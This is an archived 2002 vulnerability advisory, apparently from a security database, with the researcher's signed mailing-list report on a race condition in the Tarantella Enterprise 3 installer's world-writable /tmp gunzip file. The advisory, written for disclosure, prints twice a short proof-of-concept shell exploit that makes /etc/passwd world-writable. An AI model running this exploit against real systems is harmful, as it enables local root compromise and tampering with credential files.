Tarantella Enterprise Application Server Uses Unsafe Temporary Files During Installation, Allowing Local Users to Obtain Root Privileges on the System
|
Date: Jan 26 2002
|
Impact: Execution of arbitrary code via local system, Root access via local system
|
Exploit Included: Yes
|
Version(s): 3
|
Description: An installation vulnerability has been reported in Tarantella Enterprise 3. A local user can obtain root access to the system during installation.
Vapid Labs reported that the Tarantella installation script handles certain utility packages in an unsafe manner during installation.
A root owned file compression utility "gunzip" is apparently created in the /tmp directory with world writeable permissions. The
filename is appended with the process ID (e.g., /tmp/gunzip16152). A local user can inject malicious code into this temporary file
after the file is created but before it is executed by the Tarantella installation script. Then, when the file is executed by the
script, the malicious code will be executed with root level permissions.
A demonstration exploit script is provided:
$ echo
"#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
|
Impact: A local user can execute arbitrary code on the server with root privileges while the software is being installed.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.tarantella.com/products/e3/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
|
Underlying OS Comments: Tested on Linux Debian 2.2
|
Reported By: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 26 Jan 2002 09:46:34 -0500 (EST)
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
Subject: [VulnWatch] Vulnerability report for Tarantella Enterprise 3.
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Vapid Labs
Larry W. Cashdollar
1/14/2002
Vulnerability report for Tarantella Enterprise 3.
1. local root compromise during installation:
The installation script provided with tarentella handles utility
packages during installation insecurely. A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.
TMP_GUNZIP=$TMPDIR/gunzip$$
$ ls -l /tmp/gunzip16152
- -rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152
gunzip is extracted:
extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE
The permissions of gunzip are changed to rwx for all:
chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
extract $efilename | $TMP_GUNZIP -q > "$efilename"
2. Exploit:
There is a race condition between when gunzip is extracted and used during
installation. At which time a malicious local user could inject code to
compromise the system quickly.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unpriviledged user.
3. Recommendations:
Perhaps create a directory in /tmp or /var/tmp and use that directory as a
work place?
umask 077
mkdir /tmp/workdir
4. Software: Tarantella Enterprise 3
http://www.tarantella.com/download/e3/
Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL
gaJAw7urwOy0Ue03nEjlH2Q=
=TdDa
-----END PGP SIGNATURE-----
|
|
